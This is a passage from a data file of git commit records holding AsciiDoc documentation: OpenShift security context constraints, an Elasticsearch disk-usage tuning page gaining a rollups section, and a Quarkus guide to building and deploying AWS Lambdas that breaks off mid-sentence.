FSGROUP SUPGROUP PRIORITY\nanyuid false [] false MustRunAs RunAsAny RunAsAny RunAsAny 10\nhostaccess false [] true MustRunAs MustRunAsRange RunAsAny RunAsAny <none>\nhostmount-anyuid false [] true MustRunAs RunAsAny RunAsAny RunAsAny <none>\nnonroot false [] false MustRunAs MustRunAsNonRoot RunAsAny RunAsAny <none>\nprivileged true [] true RunAsAny RunAsAny RunAsAny RunAsAny <none>\nrestricted false [] false MustRunAs MustRunAsRange RunAsAny RunAsAny <none>\n----\n====\n\nThe definition for each SCC is also viewable by cluster administrators using the\nCLI. For example, for the privileged SCC:\n\n====\n----\n# oc export scc\/privileged\n\nallowHostDirVolumePlugin: true\nallowHostIPC: true\nallowHostNetwork: true\nallowHostPID: true\nallowHostPorts: true\nallowPrivilegedContainer: true\nallowedCapabilities: null\napiVersion: v1\nfsGroup: <1>\n type: RunAsAny\ngroups: <2>\n- system:cluster-admins\n- system:nodes\nkind: SecurityContextConstraints\nmetadata:\n annotations:\n kubernetes.io\/description: 'privileged allows access to all privileged and host\n features and the ability to run as any user, any group, any fsGroup, and with\n any SELinux context. WARNING: this is the most relaxed SCC and should be used\n only for cluster administration. Grant with caution.'\n creationTimestamp: null\n name: privileged\npriority: null\nrunAsUser: <3>\n type: RunAsAny\nseLinuxContext: <4>\n type: RunAsAny\nsupplementalGroups: <5>\n type: RunAsAny\nusers: <6>\n- system:serviceaccount:default:registry\n- system:serviceaccount:default:router\n- system:serviceaccount:openshift-infra:build-controller\n----\n\n<1> The `*FSGroup*` strategy which dictates the allowable values for the\nSecurity Context\n<2> The groups that have access to this SCC\n<3> The run as user strategy type which dictates the allowable values for the\nSecurity Context\n<4> The SELinux context strategy type which dictates the allowable values for\nthe Security Context\n<5> The supplemental groups strategy which dictates the allowable supplemental\ngroups for the Security Context\n<6> The users who have access to this SCC\n\n====\n\nThe `*users*` and `*groups*` fields on the SCC control which SCCs can be used.\nBy default, cluster administrators, nodes, and the build controller are granted\naccess to the privileged SCC. All authenticated users are granted access to the\nrestricted SCC.\n\nThe privileged SCC:\n\n- allows privileged pods.\n- allows host directories to be mounted as volumes.\n- allows a pod to run as any user.\n- allows a pod to run with any MCS label.\n- allows a pod to use the host's IPC namespace.\n- allows a pod to use the host's PID namespace.\n- allows a pod to use any FSGroup.\n- allows a pod to use any supplemental group.\n\nThe restricted SCC:\n\n- ensures pods cannot run as privileged.\n- ensures pods cannot use host directory volumes.\n- requires that a pod run as a user in a pre-allocated range of UIDs.\n- requires that a pod run with a pre-allocated MCS label.\n- allows a pod to use any FSGroup.\n- allows a pod to use any supplemental group.\n\n[NOTE]\n====\nFor more information about each SCC, see the *kubernetes.io\/description*\nannotation available on the SCC.\n====\n\nSCCs are comprised of settings and strategies that control the security features\na pod has access to. These settings fall into three categories:\n\n[cols=\"1,4\"]\n|===\n\n|*Controlled by a boolean*\n|Fields of this type default to the most restrictive value. For example,\n`*AllowPrivilegedContainer*` is always set to *false* if unspecified.\n\n|*Controlled by an allowable set*\n|Fields of this type are checked against the set to ensure their value is\nallowed.\n\n|*Controlled by a strategy*\na|Items that have a strategy to generate a value provide:\n\n- A mechanism to generate the value, and\n- A mechanism to ensure that a specified value falls into the set of allowable\nvalues.\n\n|===\n\n=== SCC Strategies\n\n==== RunAsUser\n\n. *MustRunAs* - Requires a `*runAsUser*` to be configured. Uses the configured\n`*runAsUser*` as the default. Validates against the configured `*runAsUser*`.\n. *MustRunAsRange* - Requires minimum and maximum values to be defined if not\nusing pre-allocated values. Uses the minimum as the default. Validates against\nthe entire allowable range.\n. *MustRunAsNonRoot* - Requires that the pod be submitted with a non-zero\n`*runAsUser*` or have the `USER` directive defined in the image. No default\nprovided.\n. *RunAsAny* - No default provided. Allows any `*runAsUser*` to be specified.\n\n==== SELinuxContext\n\n. *MustRunAs* - Requires `*seLinuxOptions*` to be configured if not using\npre-allocated values. Uses `*seLinuxOptions*` as the default. Validates against\n`*seLinuxOptions*`.\n. *RunAsAny* - No default provided. Allows any `*seLinuxOptions*` to be\nspecified.\n\n==== SupplementalGroups\n\n. *MustRunAs* - Requires at least one range to be specified if not using\npre-allocated values. Uses the minimum value of the first range as the default.\nValidates against all ranges.\n. *RunAsAny* - No default provided. Allows any `*supplementalGroups*` to be\nspecified.\n\n==== FSGroup\n\n. *MustRunAs* - Requires at least one range to be specified if not using\npre-allocated values. Uses the minimum value of the first range as the default.\nValidates against the first ID in the first range.\n. *RunAsAny* - No default provided. Allows any `*fsGroup*` ID to be specified.\n\n\n[[admission]]\n\n=== Admission\n_Admission control_ with SCCs allows for control over the creation of resources\nbased on the capabilities granted to a user.\n\nIn terms of the SCCs, this means that an admission controller can inspect the\nuser information made available in the context to retrieve an appropriate set of\nSCCs. Doing so ensures the pod is authorized to make requests about its\noperating environment or to generate a set of constraints to apply to the pod.\n\nThe set of SCCs that admission uses to authorize a pod are determined by the\nuser identity and groups that the user belongs to. Additionally, if the pod\nspecifies a service account, the set of allowable SCCs includes any constraints\naccessible to the service account.\n\nAdmission uses the following approach to create the final security context for\nthe pod:\n\n. Retrieve all SCCs available for use.\n. Generate field values for security context settings that were not specified\non the request.\n. Validate the final settings against the available constraints.\n\nIf a matching set of constraints is found, then the pod is accepted. If the\nrequest cannot be matched to an SCC, the pod is rejected.\n\nA pod must validate every field against the SCC. The following are examples for\njust two of the fields that must be validated:\n\n[NOTE]\n====\nThese examples are in the context of a strategy using the preallocated values.\n====\n\n*A FSGroup SCC Strategy of MustRunAs*\n\nIf the pod defines a `*fsGroup*` ID, then that ID must equal the default\n`*FSGroup*` ID. Otherwise, the pod is not validated by that SCC and the next SCC\nis evaluated. If the `*FSGroup*` strategy is *RunAsAny* and the pod omits a\n`*fsGroup*` ID, then the pod matches the SCC based on `*FSGroup*` (though other\nstrategies may not validate and thus cause the pod to fail).\n\n*A SupplementalGroups SCC Strategy of MustRunAs*\n\nIf the pod specification defines one or more `*SupplementalGroups*` IDs, then\nthe pod's IDs must equal one of the IDs in the namespace's\n*openshift.io\/sa.scc.supplemental-groups* annotation. Otherwise, the pod is not\nvalidated by that SCC and the next SCC is evaluated. If the\n`*SupplementalGroups*` setting is *RunAsAny* and the pod specification omits a\n`*SupplementalGroups*` ID, then the pod matches the SCC based on\n`*SupplementalGroups*` (though other strategies may not validate and thus cause\nthe pod to fail).\n\n==== SCC Prioritization\n\nSCCs have a priority field that affects the ordering when attempting to\nvalidate a request by the admission controller. A higher priority\nSCC is moved to the front of the set when sorting. When the complete set\nof available SCCs are determined they are ordered by:\n\n. Highest priority first, nil is considered a 0 priority\n. If priorities are equal, the SCCs will be sorted from most restrictive to least restrictive\n. If both priorities and restrictions are equal the SCCs will be sorted by name\n\nBy default, the anyuid SCC granted to cluster administrators is given priority\nin their SCC set. This allows cluster administrators to run pods as any\nuser by without specifying a `RunAsUser` on the pod's `SecurityContext`. The\nadministrator may still specify a `RunAsUser` if they wish.\n\n==== Understanding Pre-allocated Values and Security Context Constraints\n\nThe admission controller is aware of certain conditions in the security context\nconstraints that trigger it to look up pre-allocated values from a namespace and\npopulate the security context constraint before processing the pod. Each SCC\nstrategy is evaluated independently of other strategies, with the pre-allocated\nvalues (where allowed) for each policy aggregated with pod specification values\nto make the final values for the various IDs defined in the running pod.\n\nThe following SCCs cause the admission controller to look for pre-allocated\nvalues when no ranges are defined in the pod specification:\n\n. A `*RunAsUser*` strategy of *MustRunAsRange* with no minimum or maximum set.\nAdmission looks for the *openshift.io\/sa.scc.uid-range* annotation to populate\nrange fields.\n. An `*SELinuxContext*` strategy of *MustRunAs* with no level set. Admission\nlooks for the *openshift.io\/sa.scc.mcs* annotation to populate the level.\n. A `*FSGroup*` strategy of *MustRunAs*. Admission looks for the\n*openshift.io\/sa.scc.supplemental-groups* annotation.\n. A `*SupplementalGroups*` strategy of *MustRunAs*. Admission looks for the\n*openshift.io\/sa.scc.supplemental-groups* annotation.\n\nDuring the generation phase, the security context provider will default any\nvalues that are not specifically set in the pod. Defaulting is based on the\nstrategy being used:\n\n. `*RunAsAny*` and `*MustRunAsNonRoot*` strategies do not provide default\nvalues. Thus, if the pod needs a field defined (for example, a group ID), this\nfield must be defined inside the pod specification.\n. `*MustRunAs*` (single value) strategies provide a default value which is\nalways used. As an example, for group IDs: even if the pod specification defines\nits own ID value, the namespace's default field will also appear in the pod's\ngroups.\n. `*MustRunAsRange*` and `*MustRunAs*` (range-based) strategies provide the\nminimum value of the range. As with a single value `*MustRunAs*` strategy, the\nnamespace's default value will appear in the running pod. If a range-based\nstrategy is configurable with multiple ranges, it will provide the minimum value\nof the first configured range.\n\n[NOTE]\n====\n`*FSGroup*` and `*SupplementalGroups*` strategies fall back to the\n*openshift.io\/sa.scc.uid-range* annotation if the\n*openshift.io\/sa.scc.supplemental-groups* annotation does not exist on the\nnamespace. If neither exist, the SCC will fail to create.\n====\n\n[NOTE]\n====\nBy default, the annotation-based `*FSGroup*` strategy configures itself with a\nsingle range based on the minimum value for the annotation. For example, if your\nannotation reads *1\/3*, the `*FSGroup*` strategy will configure itself with a\nminimum and maximum of *1*. If you want to allow more groups to be accepted for\nthe `*FSGroup*` field, you can configure a custom SCC that does not use the\nannotation.\n====\n\n[NOTE]\n====\nThe *openshift.io\/sa.scc.supplemental-groups* annotation accepts a comma\ndelimited list of blocks in the format of `<start>\/<length` or `<start>-<end>`.\nThe *openshift.io\/sa.scc.uid-range* annotation accepts only a single block.\n====\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"947186719ed2c31180cd7b799fff340b7e899724","subject":"[DOCS] Add rollups to `Tune for disk usage` (#60436)","message":"[DOCS] Add rollups to `Tune for disk usage` (#60436)\n\n","repos":"gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch","old_file":"docs\/reference\/how-to\/disk-usage.asciidoc","new_file":"docs\/reference\/how-to\/disk-usage.asciidoc","new_contents":"[[tune-for-disk-usage]]\n== Tune for disk usage\n\n[discrete]\n=== Disable the features you do not need\n\nBy default Elasticsearch indexes and adds doc values to most fields so that they\ncan be searched and aggregated out of the box. For instance if you have a numeric\nfield called `foo` that you need to run histograms on but that you never need to\nfilter on, you can safely disable indexing on this field in your\n<<mappings,mappings>>:\n\n[source,console]\n--------------------------------------------------\nPUT index\n{\n \"mappings\": {\n \"properties\": {\n \"foo\": {\n \"type\": \"integer\",\n \"index\": false\n }\n }\n }\n}\n--------------------------------------------------\n\n<<text,`text`>> fields store normalization factors in the index in order to be\nable to score documents. If you only need matching capabilities on a `text`\nfield but do not care about the produced scores, you can configure Elasticsearch\nto not write norms to the index:\n\n[source,console]\n--------------------------------------------------\nPUT index\n{\n \"mappings\": {\n \"properties\": {\n \"foo\": {\n \"type\": \"text\",\n \"norms\": false\n }\n }\n }\n}\n--------------------------------------------------\n\n<<text,`text`>> fields also store frequencies and positions in the index by\ndefault. Frequencies are used to compute scores and positions are used to run\nphrase queries. If you do not need to run phrase queries, you can tell\nElasticsearch to not index positions:\n\n[source,console]\n--------------------------------------------------\nPUT index\n{\n \"mappings\": {\n \"properties\": {\n \"foo\": {\n \"type\": \"text\",\n \"index_options\": \"freqs\"\n }\n }\n }\n}\n--------------------------------------------------\n\nFurthermore if you do not care about scoring either, you can configure\nElasticsearch to just index matching documents for every term. You will\nstill be able to search on this field, but phrase queries will raise errors\nand scoring will assume that terms appear only once in every document.\n\n[source,console]\n--------------------------------------------------\nPUT index\n{\n \"mappings\": {\n \"properties\": {\n \"foo\": {\n \"type\": \"text\",\n \"norms\": false,\n \"index_options\": \"freqs\"\n }\n }\n }\n}\n--------------------------------------------------\n\n[discrete]\n[[default-dynamic-string-mapping]]\n=== Don't use default dynamic string mappings\n\nThe default <<dynamic-mapping,dynamic string mappings>> will index string fields\nboth as <<text,`text`>> and <<keyword,`keyword`>>. This is wasteful if you only\nneed one of them. Typically an `id` field will only need to be indexed as a\n`keyword` while a `body` field will only need to be indexed as a `text` field.\n\nThis can be disabled by either configuring explicit mappings on string fields\nor setting up dynamic templates that will map string fields as either `text`\nor `keyword`.\n\nFor instance, here is a template that can be used in order to only map string\nfields as `keyword`:\n\n[source,console]\n--------------------------------------------------\nPUT index\n{\n \"mappings\": {\n \"dynamic_templates\": [\n {\n \"strings\": {\n \"match_mapping_type\": \"string\",\n \"mapping\": {\n \"type\": \"keyword\"\n }\n }\n }\n ]\n }\n}\n--------------------------------------------------\n\n[discrete]\n=== Watch your shard size\n\nLarger shards are going to be more efficient at storing data. To increase the size of your shards, you can decrease the number of primary shards in an index by <<indices-create-index,creating indices>> with fewer primary shards, creating fewer indices (e.g. by leveraging the <<indices-rollover-index,Rollover API>>), or modifying an existing index using the <<indices-shrink-index,Shrink API>>.\n\nKeep in mind that large shard sizes come with drawbacks, such as long full recovery times.\n\n[discrete]\n[[disable-source]]\n=== Disable `_source`\n\nThe <<mapping-source-field,`_source`>> field stores the original JSON body of the document. If you don\u2019t need access to it you can disable it. However, APIs that needs access to `_source` such as update and reindex won\u2019t work.\n\n[discrete]\n[[best-compression]]\n=== Use `best_compression`\n\nThe `_source` and stored fields can easily take a non negligible amount of disk\nspace. They can be compressed more aggressively by using the `best_compression`\n<<index-codec,codec>>.\n\n[discrete]\n=== Force Merge\n\nIndices in Elasticsearch are stored in one or more shards. Each shard is a Lucene index and made up of one or more segments - the actual files on disk. Larger segments are more efficient for storing data.\n\nThe <<indices-forcemerge,`_forcemerge` API>> can be used to reduce the number of segments per shard. In many cases, the number of segments can be reduced to one per shard by setting `max_num_segments=1`.\n\n[discrete]\n=== Shrink Index\n\nThe <<indices-shrink-index,Shrink API>> allows you to reduce the number of shards in an index. Together with the Force Merge API above, this can significantly reduce the number of shards and segments of an index.\n\n[discrete]\n=== Use the smallest numeric type that is sufficient\n\nThe type that you pick for <<number,numeric data>> can have a significant impact\non disk usage. In particular, integers should be stored using an integer type\n(`byte`, `short`, `integer` or `long`) and floating points should either be\nstored in a `scaled_float` if appropriate or in the smallest type that fits the\nuse-case: using `float` over `double`, or `half_float` over `float` will help\nsave storage.\n\n[discrete]\n=== Use index sorting to colocate similar documents\n\nWhen Elasticsearch stores `_source`, it compresses multiple documents at once\nin order to improve the overall compression ratio. For instance it is very\ncommon that documents share the same field names, and quite common that they\nshare some field values, especially on fields that have a low cardinality or\na https:\/\/en.wikipedia.org\/wiki\/Zipf%27s_law[zipfian] distribution.\n\nBy default documents are compressed together in the order that they are added\nto the index. If you enabled <<index-modules-index-sorting,index sorting>>\nthen instead they are compressed in sorted order. Sorting documents with similar\nstructure, fields, and values together should improve the compression ratio.\n\n[discrete]\n=== Put fields in the same order in documents\n\nDue to the fact that multiple documents are compressed together into blocks,\nit is more likely to find longer duplicate strings in those `_source` documents\nif fields always occur in the same order.\n\n[discrete]\n[[roll-up-historical-data]]\n=== Roll up historical data\n\nKeeping older data can useful for later analysis but is often avoided due to\nstorage costs. You can use data rollups to summarize and store historical data\nat a fraction of the raw data's storage cost. See <<xpack-rollup>>.\n","old_contents":"[[tune-for-disk-usage]]\n== Tune for disk usage\n\n[discrete]\n=== Disable the features you do not need\n\nBy default Elasticsearch indexes and adds doc values to most fields so that they\ncan be searched and aggregated out of the box. For instance if you have a numeric\nfield called `foo` that you need to run histograms on but that you never need to\nfilter on, you can safely disable indexing on this field in your\n<<mappings,mappings>>:\n\n[source,console]\n--------------------------------------------------\nPUT index\n{\n \"mappings\": {\n \"properties\": {\n \"foo\": {\n \"type\": \"integer\",\n \"index\": false\n }\n }\n }\n}\n--------------------------------------------------\n\n<<text,`text`>> fields store normalization factors in the index in order to be\nable to score documents. If you only need matching capabilities on a `text`\nfield but do not care about the produced scores, you can configure Elasticsearch\nto not write norms to the index:\n\n[source,console]\n--------------------------------------------------\nPUT index\n{\n \"mappings\": {\n \"properties\": {\n \"foo\": {\n \"type\": \"text\",\n \"norms\": false\n }\n }\n }\n}\n--------------------------------------------------\n\n<<text,`text`>> fields also store frequencies and positions in the index by\ndefault. Frequencies are used to compute scores and positions are used to run\nphrase queries. If you do not need to run phrase queries, you can tell\nElasticsearch to not index positions:\n\n[source,console]\n--------------------------------------------------\nPUT index\n{\n \"mappings\": {\n \"properties\": {\n \"foo\": {\n \"type\": \"text\",\n \"index_options\": \"freqs\"\n }\n }\n }\n}\n--------------------------------------------------\n\nFurthermore if you do not care about scoring either, you can configure\nElasticsearch to just index matching documents for every term. You will\nstill be able to search on this field, but phrase queries will raise errors\nand scoring will assume that terms appear only once in every document.\n\n[source,console]\n--------------------------------------------------\nPUT index\n{\n \"mappings\": {\n \"properties\": {\n \"foo\": {\n \"type\": \"text\",\n \"norms\": false,\n \"index_options\": \"freqs\"\n }\n }\n }\n}\n--------------------------------------------------\n\n[discrete]\n[[default-dynamic-string-mapping]]\n=== Don't use default dynamic string mappings\n\nThe default <<dynamic-mapping,dynamic string mappings>> will index string fields\nboth as <<text,`text`>> and <<keyword,`keyword`>>. This is wasteful if you only\nneed one of them. Typically an `id` field will only need to be indexed as a\n`keyword` while a `body` field will only need to be indexed as a `text` field.\n\nThis can be disabled by either configuring explicit mappings on string fields\nor setting up dynamic templates that will map string fields as either `text`\nor `keyword`.\n\nFor instance, here is a template that can be used in order to only map string\nfields as `keyword`:\n\n[source,console]\n--------------------------------------------------\nPUT index\n{\n \"mappings\": {\n \"dynamic_templates\": [\n {\n \"strings\": {\n \"match_mapping_type\": \"string\",\n \"mapping\": {\n \"type\": \"keyword\"\n }\n }\n }\n ]\n }\n}\n--------------------------------------------------\n\n[discrete]\n=== Watch your shard size\n\nLarger shards are going to be more efficient at storing data. To increase the size of your shards, you can decrease the number of primary shards in an index by <<indices-create-index,creating indices>> with fewer primary shards, creating fewer indices (e.g. by leveraging the <<indices-rollover-index,Rollover API>>), or modifying an existing index using the <<indices-shrink-index,Shrink API>>.\n\nKeep in mind that large shard sizes come with drawbacks, such as long full recovery times.\n\n[discrete]\n[[disable-source]]\n=== Disable `_source`\n\nThe <<mapping-source-field,`_source`>> field stores the original JSON body of the document. If you don\u2019t need access to it you can disable it. However, APIs that needs access to `_source` such as update and reindex won\u2019t work.\n\n[discrete]\n[[best-compression]]\n=== Use `best_compression`\n\nThe `_source` and stored fields can easily take a non negligible amount of disk\nspace. They can be compressed more aggressively by using the `best_compression`\n<<index-codec,codec>>.\n\n[discrete]\n=== Force Merge\n\nIndices in Elasticsearch are stored in one or more shards. Each shard is a Lucene index and made up of one or more segments - the actual files on disk. Larger segments are more efficient for storing data.\n\nThe <<indices-forcemerge,`_forcemerge` API>> can be used to reduce the number of segments per shard. In many cases, the number of segments can be reduced to one per shard by setting `max_num_segments=1`.\n\n[discrete]\n=== Shrink Index\n\nThe <<indices-shrink-index,Shrink API>> allows you to reduce the number of shards in an index. Together with the Force Merge API above, this can significantly reduce the number of shards and segments of an index.\n\n[discrete]\n=== Use the smallest numeric type that is sufficient\n\nThe type that you pick for <<number,numeric data>> can have a significant impact\non disk usage. In particular, integers should be stored using an integer type\n(`byte`, `short`, `integer` or `long`) and floating points should either be\nstored in a `scaled_float` if appropriate or in the smallest type that fits the\nuse-case: using `float` over `double`, or `half_float` over `float` will help\nsave storage.\n\n[discrete]\n=== Use index sorting to colocate similar documents\n\nWhen Elasticsearch stores `_source`, it compresses multiple documents at once\nin order to improve the overall compression ratio. For instance it is very\ncommon that documents share the same field names, and quite common that they\nshare some field values, especially on fields that have a low cardinality or\na https:\/\/en.wikipedia.org\/wiki\/Zipf%27s_law[zipfian] distribution.\n\nBy default documents are compressed together in the order that they are added\nto the index. If you enabled <<index-modules-index-sorting,index sorting>>\nthen instead they are compressed in sorted order. Sorting documents with similar\nstructure, fields, and values together should improve the compression ratio.\n\n[discrete]\n=== Put fields in the same order in documents\n\nDue to the fact that multiple documents are compressed together into blocks,\nit is more likely to find longer duplicate strings in those `_source` documents\nif fields always occur in the same order.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7e725b65aea32d8fa77dd33e2a579941694c395c","subject":"Update changelog","message":"Update changelog\n","repos":"bmuschko\/gradle-docker-plugin,bmuschko\/gradle-docker-plugin,bmuschko\/gradle-docker-plugin","old_file":"src\/docs\/asciidoc\/50-changes.adoc","new_file":"src\/docs\/asciidoc\/50-changes.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d8d524c390080a4d8cb37de8b74c83ff7ad826f8","subject":"Fix paths for libsunec.so and cacerts (SSL reqs)","message":"Fix paths for libsunec.so and cacerts (SSL reqs)\n\nDocker commands for the additional requirements for client SSL were no longer working with 20.2.0-java11 image.","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/amazon-lambda.adoc","new_file":"docs\/src\/main\/asciidoc\/amazon-lambda.adoc","new_contents":"\/\/\/\/\nThis guide is maintained in the main Quarkus repository\nand pull requests should be submitted there:\nhttps:\/\/github.com\/quarkusio\/quarkus\/tree\/master\/docs\/src\/main\/asciidoc\n\/\/\/\/\n= Quarkus - Amazon Lambda\n:extension-status: preview\n\ninclude::.\/attributes.adoc[]\n\nThe `quarkus-amazon-lambda` extension allows you to use Quarkus to build your AWS Lambdas.\nYour lambdas can use injection annotations from CDI or Spring and other Quarkus facilities as you need them.\n\nQuarkus lambdas can be deployed using the Amazon Java Runtime, or you can build a native executable and use\nAmazon's Custom Runtime if you want a smaller memory footprint and faster cold boot startup time.\n\ninclude::.\/status-include.adoc[]\n\n== Prerequisites\n\nTo complete this guide, you need:\n\n* less than 30 minutes\n* JDK 11 (AWS requires JDK 1.8 or 11)\n* Apache Maven {maven-version}\n* https:\/\/aws.amazon.com[An Amazon AWS account]\n* https:\/\/docs.aws.amazon.com\/cli\/latest\/userguide\/cli-chap-install.html[AWS CLI]\n* https:\/\/docs.aws.amazon.com\/serverless-application-model\/latest\/developerguide\/serverless-sam-cli-install.html[AWS SAM CLI], for local testing\n\nNOTE: For Gradle projects please <<gradle,see below>>, or for further reference consult the guide in the link:gradle-tooling[Gradle setup page].\n\n== Getting Started\n\nThis guide walks you through generating an example Java project via a maven archetype and deploying it to AWS.\n\n== Installing AWS bits\n\nInstalling all the AWS bits is probably the most difficult thing about this guide. Make sure that you follow all the steps\nfor installing AWS CLI.\n\n== Creating the Maven Deployment Project\n\nCreate the Quarkus AWS Lambda maven project using our Maven Archetype.\n\n\n[source,bash,subs=attributes+]\n----\nmvn archetype:generate \\\n -DarchetypeGroupId=io.quarkus \\\n -DarchetypeArtifactId=quarkus-amazon-lambda-archetype \\\n -DarchetypeVersion={quarkus-version}\n----\n\n[NOTE]\n====\nIf you prefer to use Gradle, you can quickly and easily generate a Gradle project via https:\/\/code.quarkus.io\/[code.quarkus.io]\nadding the `quarkus-amazon-lambda` extension as a dependency.\n\nCopy the build.gradle, gradle.properties and settings.gradle into the above generated Maven archetype project, to follow along with this guide.\n\nExecute: gradle wrapper to setup the gradle wrapper (recommended).\n\nThe dependency for `quarkus-test-amazon-lambda` will also need to be added to your build.gradle.\n\nFor full Gradle details <<gradle, see below>>.\n====\n\n[[choose]]\n== Choose Your Lambda\n\nThe `quarkus-amazon-lambda` extension scans your project for a class that directly implements the Amazon `RequestHandler<?, ?>` or `RequestStreamHandler` interface.\nIt must find a class in your project that implements this interface or it will throw a build time failure.\nIf it finds more than one handler class, a build time exception will also be thrown.\n\nSometimes, though, you might have a few related lambdas that share code and creating multiple maven modules is just\nan overhead you don't want to do. The `quarkus-amazon-lambda` extension allows you to bundle multiple lambdas in one\nproject and use configuration or an environment variable to pick the handler you want to deploy.\n\nThe generated project has three lambdas within it. Two that implement the `RequestHandler<?, ?>` interface, and one that implements the `RequestStreamHandler` interface. One that is used and two that are unused. If you open up\n`src\/main\/resources\/application.properties` you'll see this:\n\n[source,properties,subs=attributes+]\n----\nquarkus.lambda.handler=test\n----\n\nThe `quarkus.lambda.handler` property tells Quarkus which lambda handler to deploy. This can be overridden\nwith an environment variable too.\n\nIf you look at the three generated handler classes in the project, you'll see that they are `@Named` differently.\n\n[source,java,subs=attributes+]\n----\n@Named(\"test\")\npublic class TestLambda implements RequestHandler<InputObject, OutputObject> {\n}\n\n@Named(\"unused\")\npublic class UnusedLambda implements RequestHandler<InputObject, OutputObject> {\n}\n\n@Named(\"stream\")\npublic class StreamLambda implements RequestStreamHandler {\n}\n----\n\nThe CDI name of the handler class must match the value specified within the `quarkus.lambda.handler` property.\n\n\n== Deploy to AWS Lambda Java Runtime\n\nThere are a few steps to get your lambda running on AWS. The generated maven project contains a helpful script to\ncreate, update, delete, and invoke your lambdas for pure Java and native deployments.\n\n== Build and Deploy\n\nBuild the project using maven.\n\n[source,bash,subs=attributes+]\n----\n.\/mvnw clean package\n----\n\nor, if using Gradle:\n----\n.\/gradlew clean assemble\n----\n\nThis will compile and package your code.\n\n== Create an Execution Role\n\nView the https:\/\/docs.aws.amazon.com\/lambda\/latest\/dg\/gettingstarted-awscli.html[Getting Started Guide] for deploying\na lambda with AWS CLI. Specifically, make sure you have created an `Execution Role`. You will need to define\na `LAMBDA_ROLE_ARN` environment variable in your profile or console window, Alternatively, you can edit\nthe `manage.sh` script that is generated by the build and put the role value directly there:\n\n[source,bash]\n----\nLAMBDA_ROLE_ARN=\"arn:aws:iam::1234567890:role\/lambda-role\"\n----\n\n== Extra Build Generated Files\n\nAfter you run the build, there are a few extra files generated by the `quarkus-amazon-lambda` extension. These files\nare in the the build directory: `target\/` for maven, `build\/` for gradle.\n\n* `function.zip` - lambda deployment file\n* `manage.sh` - wrapper around aws lambda cli calls\n* `bootstrap-example.sh` - example bootstrap script for native deployments\n* `sam.jvm.yaml` - (optional) for use with sam cli and local testing\n* `sam.native.yaml` - (optional) for use with sam cli and native local testing\n\n== Create the function\n\nThe `target\/manage.sh` script is for managing your lambda using the AWS Lambda Java runtime. This script is provided only for\nyour convenience. Examine the output of the `manage.sh` script if you want to learn what aws commands are executed\nto create, delete, and update your lambdas.\n\n`manage.sh` supports four operation: `create`, `delete`, `update`, and `invoke`.\n\nNOTE: To verify your setup, that you have the AWS CLI installed, executed aws configure for the AWS access keys,\nand setup the `LAMBDA_ROLE_ARN` environment variable (as described above), please execute `manage.sh` without any parameters.\nA usage statement will be printed to guide you accordingly.\n\nNOTE: If using Gradle, the path to the binaries in the `manage.sh` must be changed from `target` to `build`\n\nTo see the `usage` statement, and validate AWS configuration:\n[source,bash,subs=attributes+]\n----\nsh target\/manage.sh\n----\n\nYou can `create` your function using the following command:\n\n[source,bash,subs=attributes+]\n----\nsh target\/manage.sh create\n----\n\nor if you do not have `LAMBDA_ROLE_ARN` already defined in this shell:\n\n[source,bash]\n----\nLAMBDA_ROLE_ARN=\"arn:aws:iam::1234567890:role\/lambda-role\" sh target\/manage.sh create\n----\n\nWARNING: Do not change the handler switch. This must be hardcoded to `io.quarkus.amazon.lambda.runtime.QuarkusStreamHandler::handleRequest`. This\nhandler bootstraps Quarkus and wraps your actual handler so that injection can be performed.\n\nIf there are any problems creating the function, you must delete it with the `delete` function before re-running\nthe `create` command.\n\n[source,bash,subs=attributes+]\n----\nsh target\/manage.sh delete\n----\n\nCommands may also be stacked:\n[source,bash,subs=attributes+]\n----\nsh target\/manage.sh delete create\n----\n\n== Invoke the Lambda\n\nUse the `invoke` command to invoke your function.\n\n[source,bash,subs=attributes+]\n----\nsh target\/manage.sh invoke\n----\n\nThe example lambda takes input passed in via the `--payload` switch which points to a json file\nin the root directory of the project.\n\nThe lambda can also be invoked locally with the SAM CLI like this:\n\n[source,bash]\n----\nsam local invoke --template target\/sam.jvm.yaml --event payload.json\n----\n\nIf you are working with your native image build, simply replace the template name with the native version:\n\n[source,bash]\n----\nsam local invoke --template target\/sam.native.yaml --event payload.json\n----\n\n== Update the Lambda\n\nYou can update the Java code as you see fit. Once you've rebuilt, you can redeploy your lambda by executing the\n`update` command.\n\n[source,bash,subs=attributes+]\n----\nsh target\/manage.sh update\n----\n\n== Deploy to AWS Lambda Custom (native) Runtime\n\nIf you want a lower memory footprint and faster initialization times for your lambda, you can compile your Java\ncode to a native executable. Just make sure to rebuild your project with the `-Pnative` switch.\n\nFor Linux hosts execute:\n\n[source,bash,subs=attributes+]\n----\nmvn package -Pnative\n----\n\nor, if using Gradle:\n[source,bash,subs=attributes+]\n----\n.\/gradlew build -Dquarkus.package.type=native\n----\n\nNOTE: If you are building on a non-Linux system, you will need to also pass in a property instructing quarkus to use a docker build as Amazon\nLambda requires linux binaries. You can do this by passing this property to your Maven build:\n`-Dnative-image.docker-build=true`, or for Gradle: `--docker-build=true`. This requires you to have docker installed locally, however.\n\n[source,bash,subs=attributes+]\n----\n.\/mvnw clean install -Pnative -Dnative-image.docker-build=true\n----\n\nor, if using Gradle:\n[source,bash,subs=attributes+]\n----\n.\/gradlew build -Dquarkus.package.type=native -Dquarkus.native.container-build=true\n----\n\nEither of these commands will compile and create a native executable image. It also generates a zip file `target\/function.zip`.\nThis zip file contains your native executable image renamed to 